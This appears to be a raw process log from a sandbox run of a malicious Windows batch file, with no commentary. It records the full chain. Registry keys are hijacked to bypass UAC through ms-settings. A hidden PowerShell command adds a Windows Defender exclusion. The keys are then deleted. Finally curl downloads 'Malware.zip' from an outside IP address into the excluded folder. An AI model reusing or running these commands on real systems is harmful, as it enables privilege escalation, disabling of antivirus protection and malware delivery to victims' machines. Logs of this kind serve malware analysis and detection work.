cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "iYxNOhPj" C:\Users\test22\AppData\Local\Temp\Bypass.bat
2540reg.exe reg add "HKCU\Software\Classes\.thm\Shell\Open\command" /v "" /d "C:\Users\test22\AppData\Local\Temp\X.exe -WindowStyle Hidden -Command & {Add-MpPreference -ExclusionPath 'C:\Users\test22\AppData\Local\ServiceHub'}" /f
2712reg.exe reg add "HKCU\Software\Classes\ms-settings\CurVer" /d ".thm" /f
2756timeout.exe timeout "3"
2824cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo yes "
2888reg.exe reg delete "HKCU\Software\Classes\.thm\Shell\Open\command" /f
2924cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo yes "
2976reg.exe reg delete "HKCU\Software\Classes\ms-settings\CurVer" /f
3012timeout.exe timeout "60"
3068curl.exe curl "45.66.230.113/Malware.zip" -O "C:\Users\test22\AppData\Local\ServiceHub\Malware.zip"
2744